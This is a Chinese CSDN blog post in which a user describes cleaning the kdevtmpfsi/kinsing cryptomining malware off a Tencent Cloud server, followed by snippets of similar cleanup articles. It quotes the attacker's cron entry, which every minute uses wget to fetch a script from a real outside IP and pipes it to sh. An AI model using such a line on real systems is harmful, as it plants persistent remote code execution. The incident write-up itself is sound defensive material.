腾讯云服务器遭遇kdevtmpfsi挖矿病毒

已于 2023-06-13 16:50:39 修改
阅读量1.1k 收藏 2
点赞数
文章标签: 腾讯云 云计算 安全 服务器
于 2023-06-02 17:57:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sunydayshine/article/details/131011646
版权
文章描述了一位用户收到腾讯云的警报,提示服务器检测到恶意文件并疑似被黑客入侵。用户通过Web界面登录服务器,发现CPU使用率高,清理了kdevtmpfsi等恶意进程和文件,但问题反复出现。进一步调查发现一个cronjob定时任务在下载并执行恶意脚本,删除该任务及剩余恶意文件后,服务器恢复正常。
摘要由CSDN通过智能技术生成

首次感知是云服务器报警短信

【腾讯云】尊敬的腾讯云用户,您好!您的腾讯云时间:2023-06-02 15:08:50(GMT+8:00),
检测到存在待处理的恶意文件:/tmp/kdevtmpfsi,威胁等级:严重,您的服务器疑似被黑客入侵,
建议您及时确认,避免造成严重损失,请前往主机安全
【腾讯云】尊敬的腾讯云用户,您好!您的腾讯云时间:2023-06-02 15:03:58(GMT+8:00),
检测到存在待处理的恶意文件:/etc/libsystem.so,威胁等级:严重,您的服务器疑似被黑客入侵,
建议您及时确认,避免造成严重损失,请前往主机安全

【腾讯云】尊敬的腾讯云用户,您好!您的腾讯云时间:2023-06-02 15:04:02(GMT+8:00),
检测到存在待处理的恶意文件:/etc/kinsing,威胁等级:严重,您的服务器疑似被黑客入侵,
建议您及时确认,避免造成严重损失,请前往主机安全

使用远程登录工具和本地ssh命令已经无法链接该服务器,只能到腾讯云平台在web页登录,同时在页面看到 CPU已经彪到100%。登录到服务器后开始检查数据库数据,发现并没有被破坏,然后开始清理病毒,先使用top命令看到这个进程,然后将其kill掉,然后再去/etc/文件下找到了异常文件libsystem.so和kinsing,将其删除。起初以为如此就完事了,然而并没有

30559 root      20   0 3075912   6360      0 S 374.1  0.1  22:52.79 kdevtmpfsi                                                                                                 
29056 root      20   0 4773936   1.0g   3696 S  22.3 13.4 867:06.86 java                                                                                                       
15304 root      20   0 7591136   1.2g   3036 S   1.0 15.7 263:42.45 java                                                                                                       
 9062 root      20   0   51792   6416   2984 S   0.7  0.1  16:03.46 tat_agent                                                                                                  
20425 root      20   0  985464  43048  10156 S   0.7  0.5  53:27.58 YDService                                                                                                  
 4768 root      20   0  161972   2208   1564 R   0.3  0.0   0:00.03 top                                                                                                        
30223 root      20   0 5873268 584972   4296 S   0.3  7.4  20:22.76 java                                                                                                       
    1 root      20   0  191056   3620   2136 S   0.0  0.0  14:48.49 systemd                                                                                                    
    2 root      20   0       0      0      0 S   0.0  0.0   0:04.28 kthreadd                                                                                                   
    4 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 kworker/0:0H                                                                                               
    6 root      20   0       0      0      0 S   0.0  0.0   1:11.17 ksoftirqd/0                                                                                                
    7 root      rt   0       0      0      0 S   0.0  0.0   0:33.11 migration/0

没一会儿的功夫的,监控发现cpu又打满了100%,然后我又开始重复的步骤,杀进程删文件,看来这个病毒并没有这么容易解决。

明明之中感觉到这个应该是有个定时任务在控制病毒文件的下载和执行,于是在linux服务器使用crontab -l 命令查到了一个异常的定时任务

* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1

一看就是在偷偷下载不怀好意的脚本文件,确定了这个ip不是我们机器,然后果断删除这个定时任务,然后又重复杀掉kdevtmpfsi进程,删除相关文件夹,机器终于恢复了正常。

sunydayshine
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
kdevtmpfsi 挖矿病毒清除(亲测)
逸雅安然
07-07 4325
废话不多说,直接开始清理 找到矿毒进程 ps -aux | grep kinsing ps -aux | grep kdevtmpfsi 杀死进程: kill -9 PID (杀死两个) 删除Linux下的异常定时任务 crontab -l //查看定时任务 crontab -r //表示删除用户的定时任务,当执行此命令后,所有用户下面的定时任务会被删除 删除文件 rm -rf kdevtmpfsi rm -rf /var/tmp/kinsing 最后自己可以再检查一下是否还有
排查腾讯云服务器挖矿病毒【pnscan】挟持
fanxindong0620的博客
09-27 6500
一、问题发现 最新在使用腾讯云部署项目应用,具体方式为docker部署,今天早上起床发现腾讯发来一条报警信息: 二、排查过程 使用last查看最近登录信息 使用history查看历史指令 查看/etc/passwd下的账户信息 查看日志文件/var/log/secure和/var/log/message 使用top查看进程运行信息 使用netstat查看端口信息 三、解决方案 ...
腾讯云服务器被恶意挖矿处理建议----检测到存在待处理的恶意文件:/usr/share/xmrigMiner,威胁等级:严重,您的服务器疑似被黑客入侵,建议您及时确认,避免造成严重损失。
最新发布
weixin_58622844的博客
08-09 3049
事情是这样的,前两天搭建微服务项目的时候需要用到服务器,第一天刚部署上项目,紧接着第二天就被黑客扫了,既没办法访问,也没办法远程连接。
记录日志:腾讯云服务器遭遇挖矿病毒 清除操作日志
qq_44752800的博客
01-18 1277
你未必出类拔萃,但一定与众不同 12月16日下午16时许 腾讯云服务器部署项目时,项目不管上没上线,tomcat原本是启动的,但是非正常原因断开连接,结束 重新启动多次tomcat发现都会非正常关闭,查看服务器cpu使用率奇高无比,最高的时候一个达到97%的CPU占用率,发现不明进程正在运行,百度一下发现是挖矿病毒,还是两种;记录一下操作日志,方便以后再次清除; [root@VM-0-6-centos bin]# top -H top - 16:57:21 up 2 days, 1:57, 1 us.
记录kdevtmpfsi病毒
挥起镰刀的博客
05-27 1347
2021-5-26日,通过IDEA2020中的Docker插件来连接腾讯云服务器。由于开放了2375端口,并未做任何安全配置,中了挖矿病毒kdevtmpfsi。 使用 kill 命令可以将程序终止,但是Root的大部分命令权限被黑,已经无法操作,尚未解决。 通过docker中的不明容器可以判断,确实是通过docker进入的 由于百度解决未果,只能备份数据后重装系统。。 ...
Linux服务器kdevtmpfsi挖矿病毒解决方法:治标+治本
热门推荐
Cupster
02-25 4万+
问题描述 Linux服务器(包括但不限于CentOS)出现名为kdevtmpfsi的进程,占用高额的CPU、内存资源; 并且单纯的kill -9 进程ID 例:kill -9 23455无法完全杀死,不久便会复活; 同2.理杀死 kdevtmpfsi的守护进程kinsing,一小段时间又会出现这对进程; 找到并删除这2个进程对应的可执行文件例:find / -name kinsing,一小段时......
阿里云服务器中了挖矿程序应该如何清除
m0_65455195的博客
12-17 5617
阿里云服务器中了挖矿程序如何处理?云安全中心安全告警短信提醒云服务器中了挖矿程序怎么处理?护云盾来详细说下阿里云服务器挖矿程序的解决方法,一种是使用云安全中心自动处理,另一种方式是自行手动清除。 阿里云服务器挖矿程序解决方法 如果你的阿里云服务器中了挖矿程序,你有两种处理方式,一种是使用云安全中心自动清理,另一种是手动清除: 云安全中心处理挖矿程序 1、登录到云安全中心控制台 2、左侧栏,选择“威胁检测”--“安全告警处理” 在安全告警处理列表中,找到挖矿程序,然后点“处理” 云安全中心安
腾讯云服务器如何安装宝塔面板?
m0_74454642的博客
10-22 3788
宝塔建站,腾讯云,阿里云,免费宝塔。免费腾讯云。还有极其方便的一键迁移,两台服务器安装宝塔面板,可实现一键迁移服务器网站、FTP、数据库。例如:创建管理网站、FTP、数据库,拥有可视化文件管理器,可视化软件管理器,可视化CPU、内存、流量监控图表,计划任务等功能。为了方便用户建立网站,宝塔面板上的一键部署源码插件,可一键部署:Discuz,Wordpress,Ecshop,Thinkphp,Z-blog,Dedecms等程序。还有极其方便的一键迁移,两台服务器安装宝塔Linux面板,可
confluence挖矿病毒kdevtmpfsi 、solrd)解决
lin351550660的专栏
01-12 3567
自己安装了conference,没用1周。发现服务器内存被吃完了。 定位问题: 1、之前就听说过confluence 有漏洞 攻击者会利用confluence编辑页面的某个参数进行写入攻击。所以直接在百度搜索:confluence挖矿病毒 2、感谢https://www.cnblogs.com/hack404/p/11464890.html作者的帮助。 处理过程: 1. 先封掉外网HTTP 端口 使用腾讯云控制台 安全组 设置80端口不允许访问。 2. 查杀进程 使用命令:top 查..
挖矿病毒 kdevtmpfsi 处理
owenzhang的博客
11-30 843
我参与11月更文挑战的第21天,活动详情查看:2021最后一次更文挑战 症状表现 服务器CPU资源使用一直处于100%的状态,通过 top 命令查看,发现可疑进程 kdevtmpfsi。通过 google搜索,发现这是挖矿病毒。 排查方法 首先:查看 kdevtmpfsi 进程,使用 ps -ef | grep kdevtmpfsi ps -ef | grep kinsing命...
kdevtmpfsi 处理(挖矿病毒清除)
Ancoda的博客
04-26 7926
kdevtmpfsi 是一个挖矿病毒,大多数都是 redis 程序侵入,其利用Redis未授权或弱口令作为入口,使用主从同步的方式从恶意服务器上同步恶意module,之后在目标机器上加载此恶意module并执行恶意指令。普遍比较明显的就是 占用高额的CPU、内存资源,而且受害者还不少。
挖矿kdevtmpfsi病毒处理
感冒石头的博客
05-14 1024
通过top命令可以看到kdevtmpfsi导致CPU 700%多,导致该病毒只要是通过redis漏洞进来的。1、该病毒还有守护进程,如果光kill掉该病毒,过段时间又起来的。守护进程:kinsing 2、该病毒还有定时任务、如果光杀死kdevtmpfsi和kinsing没有用,定时任务会再度重启这两个进程。解决办法:1、设置redis只对当前服务器或者指定服务器放开。取消掉 bind 0.0.0.0 设置 bind 127.0.0.1 或者加其他ip ,2、crontab -l ----》可以在...
Hadoop漏洞被传挖矿病毒(/tmp/kdevtmpfsi kinsing)
lucas5的博客
12-21 371
大数据服务器,被病毒挖矿
Linux被kdevtmpfsi 挖矿病毒入侵
qq_45186545的博客
01-06 2万+
Linux被kdevtmpfsi挖矿病毒入侵一. 错误信息二.解决问题1.首先停掉kdevtmpfsi的程序2.删除Linux下的异常定时任务3.结束kdevtmpfsi进程及端口占用4.删除掉kdevtmpfsi的相关文件 一. 错误信息 先上阿里云上的报警信息。有个最大的问题是:top命令查看自己服务器CPU运行情况,会发现kdevtmpfsi的进程,CPU使用率为100%,第一次删除干净了k...
查杀kdevtmpfsi挖矿病毒
c123m的专栏
06-08 451
1. top找到PID [root@demo ~]# top PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 15843 yarn 20 0 2653576 2.3g 996 S 100.0 15.0 11:23.75 kdevt
【问题处理笔记】服务器处理kdevtmpfsi挖矿病毒
野臻
12-25 1万+
公司服务器CPU资源占用一直处于100%的状态,检查发现是kdevtmpfsi和networkservice两个进程占用导致的。两个进程都为挖矿程序。 处理步骤如下: 一、networkservice进程处理 祥见该文章 https://blog.csdn.net/daiyuhe/article/details/95683393 二、kdevtmpfsi进程处理 见该文章 ht...
Linux服务器挖矿病毒kdevtmpfsi处理
lilifly123的博客
12-17 1253
Linux服务器挖矿病毒kdevtmpfsi处理 症状表现: 服务器CPU资源使用一直处于100%的状态,通过 top 命令查看,发现可疑进程 kdevtmpfsi。通过 google搜索,发现这是挖矿病毒。 排查方法: 首先:查看 kdevtmpfsi 进程,使用 ps -ef | grep kdevtmpfsi 命令查看,见下图。 PS: 通过 ps -ef 命令查出 kdevtmpfsi 进程号,直接 kill -9 进程号并删除 /tmp/kdevtmpfsi 执行文件。但没有过1分钟进程又运
记Linux服务器中的 kdevtmpfsi 挖矿病毒
weixin_51349952的博客
07-03 559
2021.7.2日(周五)邻近下班,突然旁边的小美同事急促的告知我网站后台上不去了,然后就上服务器上去看,一看发现内存占用变成90%左右,当时一惊,那就加个班吧~ 使用top命令查看后,发现有个进程占了很大资源,这个进程就是kdevtmpfs,Google 一下才知道,好家伙,服务器被当成矿机了 top 这个进程以及相关进程,都是运行在 www 用户下,并且会加上一个定时任务 直接 kill 并不能将其结束掉,它还有守护进程及可能存在的定时任务。 1. 查看定时任务 crontab
记一次服务器服务器kdevtmpfsi病毒的解决
Dark_AK44的博客
06-08 1674
服务器 被植入 kdevtmpfsi 病毒,治标治本
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值